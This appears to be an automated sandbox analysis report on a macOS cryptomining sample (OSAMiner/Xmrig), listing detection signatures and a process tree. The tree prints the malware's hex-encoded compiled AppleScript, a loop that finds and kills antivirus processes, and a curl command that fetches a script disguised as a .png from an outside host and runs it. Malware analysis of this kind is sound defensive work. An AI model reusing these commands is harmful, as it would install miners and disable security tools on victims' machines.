Analysis Report gqnmir4Hus

Overview

General Information

Sample Name: gqnmir4Hus
Analysis ID: 1344210
MD5: 831c1ec1b594ace3c97787b077ba9dac
SHA1: 93b2653a4259d9c04e5b780762dc4abc40c49d35
SHA256: df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8

Detection

OSAMiner Xmrig
Score: 80
Range: 0 - 100
Whitelisted: false

Signatures

Yara detected OSAMiner
Yara detected Xmrig cryptocurrency miner
Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping, indicative of miners
Found strings related to Crypto-Mining
Process executable has a file extension which is uncommon (probably to disguise the executable)
Scans the system for common Anti-Virus software
Writes compiled Apple script to disk (with potentially malicious intention)
Written Apple script contains an uncommon file extension (probably to disguise the script)
Copies directory hierarchies, creates and/or extracts archives with shell command 'ditto'
Detected TCP or UDP traffic on non-standard ports
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "grep" command used to find patterns in files or piped streams
Executes the "mkdir" command used to create folders
Executes the "pgrep" command used to search for and/or send signals to processes
Executes the "ping" command used for connectivity testing via ICMP
Executes the "ps" command used to list the status of processes
Executes the "rm" command used to delete files or directories
Executes the "system_profiler" command used to collect detailed system hardware and software information
Many shell processes execute programs via the execve syscall (might be indicative of malicious behavior)
Reads hardware related sysctl values
Reads launchservices plist files
Reads the sysctl hardware model value (might be used for detecting VM presence)
Reads the system's hostname
Sample tries to kill a process (SIGKILL)
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Writes ZIP files to disk

Startup

  • System is mac1
  • sudo (MD5: 60ac5909d06d86e22aace3a863b13690) Arguments:
    • sudo New Fork (PID: 548, Parent: 547)
    • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Desktop/gqnmir4Hus.scpt
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c printf '%b' '\x46\x61\x73\x64\x55\x41\x53\x20\x31\x2E\x31\x30\x31\x2E\x31\x30\x0E\x00\x00\x00\x04\x0F\xFF\xFF\xFF\xFE\x00\x01\x00\x02\x01\xFF\xFF\x00\x00\x01\xFF\xFE\x00\x00\x0E\x00\x01\x00\x00\x0F\x10\x00\x02\x00\x06\xFF\xFD\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x01\xFF\xFD\x00\x00\x10\x00\x03\x00\x04\xFF\xFC\xFF\xFB\xFF\xFA\xFF\xF9\x0B\xFF\xFC\x00\x05\x30\x00\x01\x65\x00\x00\x0B\xFF\xFB\x00\x05\x30\x00\x01\x64\x00\x00\x0B\xFF\xFA\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x0A\xFF\xF9\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x0E\x00\x04\x00\x07\x10\xFF\xF8\xFF\xF7\xFF\xF6\xFF\xF5\x00\x08\x00\x09\xFF\xF4\x0B\xFF\xF8\x00\x05\x30\x00\x01\x65\x00\x00\x01\xFF\xF7\x00\x00\x0E\xFF\xF6\x00\x02\x04\xFF\xF3\x00\x0A\x03\xFF\xF3\x00\x01\x0E\x00\x0A\x00\x01\x00\xFF\xF2\x0B\xFF\xF2\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xF5\x00\x00\x10\x00\x08\x00\x03\xFF\xF1\xFF\xF0\xFF\xEF\x0B\xFF\xF1\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xF0\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xEF\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x09\x00\x08\xFF\xEE\xFF\xED\xFF\xEC\xFF\xEB\xFF\xEA\xFF\xE9\xFF\xE8\xFF\xE7\x0A\xFF\xEE\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xED\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xEC\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xEB\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xEA\x00\x64\x0A\xFF\xE9\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xE8\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xE7\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xF4\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1E\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x05\x00\x07\x10\xFF\xE6\xFF\xE5\xFF\xE4\xFF\xE3\x00\x0B\x00\x0C\xFF\xE2\x0B\xFF\xE6\x00\x05\x30\x00\x01\x64\x00\x00\x01\xFF\xE5\x00\x00\x0E\xFF\xE4\x0
0\x02\x04\xFF\xE1\x00\x0D\x03\xFF\xE1\x00\x01\x0E\x00\x0D\x00\x01\x00\xFF\xE0\x0B\xFF\xE0\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xE3\x00\x00\x10\x00\x0B\x00\x03\xFF\xDF\xFF\xDE\xFF\xDD\x0B\xFF\xDF\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xDE\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xDD\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x0C\x00\x08\xFF\xDC\xFF\xDB\xFF\xDA\xFF\xD9\xFF\xD8\xFF\xD7\xFF\xD6\xFF\xD5\x0A\xFF\xDC\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xDB\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xDA\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xD9\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xD8\x00\x64\x0A\xFF\xD7\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xD6\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xD5\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xE2\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1F\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x06\x00\x07\x10\xFF\xD4\xFF\xD3\xFF\xD2\xFF\xD1\x00\x0E\x00\x0F\xFF\xD0\x0B\xFF\xD4\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xD3\x00\x00\x0E\xFF\xD2\x00\x02\x04\xFF\xCF\x00\x10\x03\xFF\xCF\x00\x01\x0E\x00\x10\x00\x01\x00\xFF\xCE\x0B\xFF\xCE\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x02\xFF\xD1\x00\x00\x10\x00\x0E\x00\x02\xFF\xCD\xFF\xCC\x0B\xFF\xCD\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x0B\xFF\xCC\x00\x07\x30\x00\x03\x5F\x69\x64\x00\x00\x10\x00\x0F\x00\x08\x00\x11\xFF\xCB\x00\x12\xFF\xCA\x00\x13\x00\x14\xFF\xC9\xFF\xC8\x0E\x00\x11\x00\x01\xB1\x00\x15\x11\x00\x15\x00\x1A\x00\x70\x00\x73\x00\x20\x00\x61\x00\x78\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x0A\xFF\xCB\x00\x04\x0A\x73\x74\x72\x71\x0E\x00\x12\x00\x01\xB1\x00\x16\x11\x00\x16\x00\x44\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x2D\x00\x76\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x7C\x00\x20\x00\x61\x00\x77\x00\x6B\x00\x20\x0
0\x27\x00\x7B\x00\x70\x00\x72\x00\x69\x00\x6E\x00\x74\x00\x20\x00\x24\x00\x31\x00\x7D\x00\x27\x0A\xFF\xCA\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0E\x00\x13\x00\x01\xB1\x00\x17\x11\x00\x17\x00\x00\x0E\x00\x14\x00\x01\xB1\x00\x18\x11\x00\x18\x00\x10\x00\x6B\x00\x69\x00\x6C\x00\x6C\x00\x20\x00\x2D\x00\x39\x00\x20\x01\xFF\xC9\x00\x00\x02\xFF\xC8\x00\x00\x11\xFF\xD0\x00\x2C\x14\x00\x24\xE0\xA0\xE1\x2C\x25\xE2\x25\x6A\x0C\x00\x03\x45\xB1\x4F\xA1\xE4\x01\x1D\x00\x0C\xE5\xA1\x25\x6A\x0C\x00\x03\x59\x00\x03\x68\x57\x00\x08\x58\x00\x06\x00\x07\x68\x0F\x0E\x00\x07\x00\x07\x10\xFF\xC7\xFF\xC6\xFF\xC5\xFF\xC4\x00\x19\x00\x1A\xFF\xC3\x0A\xFF\xC7\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x01\xFF\xC6\x00\x00\x01\xFF\xC5\x00\x00\x02\xFF\xC4\x00\x00\x10\x00\x19\x00\x01\xFF\xC2\x0B\xFF\xC2\x00\x05\x30\x00\x01\x69\x00\x00\x10\x00\x1A\x00\x30\x00\x1B\xFF\xC1\xFF\xC0\x00\x1C\xFF\xBF\x00\x1D\x00\x1E\xFF\xBE\xFF\xBD\xFF\xBC\x00\x1F\xFF\xBB\xFF\xBA\xFF\xB9\xFF\xB8\x00\x20\xFF\xB7\xFF\xB6\xFF\xB5\x00\x21\xFF\xB4\xFF\xB3\xFF\xB2\xFF\xB1\x00\x22\x00\x23\x00\x24\xFF\xB0\xFF\xAF\xFF\xAE\xFF\xAD\xFF\xAC\xFF\xAB\x00\x25\xFF\xAA\xFF\xA9\xFF\xA8\x00\x26\x00\x27\x00\x28\xFF\xA7\x00\x29\x00\x2A\x00\x2B\x00\x2C\x00\x2D\x00\x2E\x00\x2F\x0E\x00\x1B\x00\x01\xB1\x00\x30\x11\x00\x30\x00\x08\x00\x83\x00\x90\x00\x60\x00\x99\x0B\xFF\xC1\x00\x06\x30\x00\x02\x6D\x73\x00\x00\x0B\xFF\xC0\x00\x05\x30\x00\x01\x6E\x00\x00\x08\x00\x1C\x00\x08\x3F\xC9\x99\x99\x99\x99\x99\x9A\x0A\xFF\xBF\x00\x18\x2E\x73\x79\x73\x6F\x64\x65\x6C\x61\x6E\x75\x6C\x6C\xFF\xFF\x80\x00\xFF\xFF\x80\x00\x6E\x6D\x62\x72\x0F\x00\x1D\x01\xD4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x65\x76\x73\x00\x02\x01\x00\x61\x6C\x69\x73\x00\x00\x00\x00\x01\x76\x00\x02\x00\x01\x03\x4D\x41\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCE\xA2\xE5\x88\x48\x2B\x00\x00\x00\x00\x00\x30\x11\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x30\x61\xCC\x08\x6F\x49\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x09\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x00\x10\x00\x08\x00\x00\xCE\xA2\x75\x08\x00\x00\x00\x11\x00\x08\x00\x00\xCC\x07\xFE\xC9\x00\x00\x00\x01\x00\x0C\x00\x00\x00\x30\x00\x00\x00\x2A\x00\x00\x00\x29\x00\x02\x00\x34\x4D\x41\x43\x3A\x53\x79\x73\x74\x65\x6D\x3A\x00\x4C\x69\x62\x72\x61\x72\x79\x3A\x00\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x3A\x00\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x0E\x00\x24\x00\x11\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6D\x00\x20\x00\x45\x00\x76\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x2E\x00\x61\x00\x70\x00\x70\x00\x0F\x00\x08\x00\x03\x00\x4D\x00\x41\x00\x43\x00\x12\x00\x2D\x53\x79\x73\x74\x65\x6D\x2F\x4C\x69\x62\x72\x61\x72\x79\x2F\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x2F\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x13\x00\x01\x2F\x00\xFF\xFF\x00\x00\x0E\x00\x1E\x00\x01\xB1\x00\x31\x11\x00\x31\x00\x20\x00\x41\x00\x63\x00\x74\x00\x69\x00\x76\x00\x69\x00\x74\x00\x79\x00\x20\x00\x4D\x00\x6F\x00\x6E\x00\x69\x00\x74\x00\x6F\x00\x72\x0B\xFF\xBE\x00\x05\x30\x00\x01\x73\x00\x00\x0A\xFF\xBD\x00\x04\x0A\x70\x63\x61\x70\x0A\xFF\xBC\x00\x18\x2E\x63\x6F\x72\x65\x64\x6F\x65\x78\x62\x6F\x6F\x6C\x00\x00\x00\x00\x00\x00\x10\x00\x6F\x62\x6A\x20\x0E\x00\x1F\x00\x0
1\xB1\x00\x32\x11\x00\x32\x00\x08\x00\x2E\x00\x61\x00\x70\x00\x70\x0B\xFF\xBB\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xBA\x00\x00\x02\xFF\xB9\x00\x00\x03\xFF\xB8\x00\x0A\x0E\x00\x20\x00\x01\xB1\x00\x33\x11\x00\x33\x00\xD4\x00\xD4\x00\xD7\x00\x84\x00\xC5\x00\xDC\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xA9\x00\x84\x00\x8B\x00\x97\x00\x9A\x00\x94\x00\xE0\x00\xAF\x00\xC9\x00\xC9\x00\xD4\x00\xC9\x00\xD6\x00\xE0\x00\xB1\x00\xC5\x00\xC7\x00\xB1\x00\xCB\x00\xD6\x00\xE0\x00\xB0\x00\xC9\x00\xD1\x00\xD3\x00\xD2\x00\xE0\x00\xB1\x00\xC5\x00\xD0\x00\xDB\x00\xC5\x00\xD6\x00\xC9\x00\xE0\x00\xA5\x00\xDA\x00\xC5\x00\xD7\x00\xD8\x00\xE0\x00\xA5\x00\xDA\x00\xCD\x00\xD6\x00\xC5\x00\xE0\x00\xA7\x00\xD0\x00\xC9\x00\xC5\x00\xD2\x00\xB1\x00\xDD\x00\xB1\x00\xC5\x00\xC7\x00\x8B\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xDA\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\xE0\x00\x84\x00\xC5\x00\xDB\x00\xCF\x00\x84\x00\x8B\x00\xDF\x00\xD4\x00\xD6\x00\xCD\x00\xD2\x00\xD8\x00\x84\x00\x88\x00\x95\x00\xE1\x00\x8B\x0B\xFF\xB7\x00\x05\x30\x00\x01\x64\x00\x00\x0A\xFF\xB6\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0B\xFF\xB5\x00\x05\x30\x00\x01\x70\x00\x00\x0E\x00\x21\x00\x01\xB1\x00\x34\x11\x00\x34\x00\x00\x0A\xFF\xB4\x00\x04\x0A\x63\x70\x61\x72\x0A\xFF\xB3\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xB2\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xB1\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x0E\x00\x22\x00\x01\xB1\x00\x35\x11\x00\x35\x00\x10\x00\xCF\x00\xCD\x00\xD0\x00\xD0\x00\x84\x00\x91\x00\x9D\x00\x84\x0E\x00\x23\x00\x01\xB1\x00\x36\x11\x00\x36\x00\x12\x00\x49\x00\x6E\x00\x73\x00\x74\x00\x61\x00\x6C\x00\x6C\x00\x65\x00\x72\x0E\x00\x24\x00\x01\xB1\x00\x37\x11\x00\x37\x00\x28\x00\x93\x00\xDA\x00\xC5\x00\xD6\x00\x93\x00\xD0\x00\xD3\x00\xCB\x00\x93\x00\xCD\x00\xD2\x00\xD7\x00\xD8\x00\xC
5\x00\xD0\x00\xD0\x00\x92\x00\xD0\x00\xD3\x00\xCB\x0A\xFF\xB0\
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c osascript ~/Library/k.plist > /dev/null 2> /dev/null &
        • sh New Fork (PID: 551, Parent: 550)
        • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Library/k.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 588, Parent: 587)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 589, Parent: 587)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 590, Parent: 587)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 591, Parent: 587)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c kill -9 360
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 598, Parent: 597)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 599, Parent: 597)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 600, Parent: 597)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 601, Parent: 597)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 604, Parent: 603)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 605, Parent: 603)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 606, Parent: 603)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 607, Parent: 603)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 609, Parent: 608)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 610, Parent: 608)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 611, Parent: 608)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 612, Parent: 608)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 615, Parent: 614)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 616, Parent: 614)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 617, Parent: 614)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 618, Parent: 614)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 620, Parent: 619)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 621, Parent: 619)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 622, Parent: 619)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 623, Parent: 619)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 626, Parent: 625)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 627, Parent: 625)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 628, Parent: 625)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 629, Parent: 625)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 631, Parent: 630)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 632, Parent: 630)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 633, Parent: 630)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 634, Parent: 630)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 637, Parent: 636)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 638, Parent: 636)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 639, Parent: 636)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 640, Parent: 636)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 642, Parent: 641)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 643, Parent: 641)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 644, Parent: 641)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 645, Parent: 641)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/Library/k.plist
      • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/Library/k.plist
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
        • sh New Fork (PID: 554, Parent: 553)
        • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: /usr/sbin/system_profiler SPHardwareDataType
        • sh New Fork (PID: 555, Parent: 553)
        • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk /Serial/ { print $NF }
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ping -c 1 www.apple.com
      • ping (MD5: d91d8718ec1f2d5bcd4c02e7cad8282a) Arguments: ping -c 1 www.apple.com
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl http://www.budaybu100001.com:8080
      • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl http://www.budaybu100001.com:8080
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl -L http://budaybu.com:8080/budaybu.png -o ~/Library/11.png
      • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl -L http://budaybu.com:8080/budaybu.png -o /Users/henry/Library/11.png
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c osascript ~/Library/11.png > /dev/null 2> /dev/null &
        • sh New Fork (PID: 561, Parent: 560)
        • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Library/11.png
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c df -g / | grep / | grep -v grep | awk '{print $2}'
            • sh New Fork (PID: 563, Parent: 562)
            • df (MD5: 81164469cf7add4a64a67fc25d1f7e8a) Arguments: df -g /
            • sh New Fork (PID: 564, Parent: 562)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep /
            • sh New Fork (PID: 565, Parent: 562)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 566, Parent: 562)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $2}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -d &> /dev/null & echo $!
            • sh New Fork (PID: 568, Parent: 567)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -d
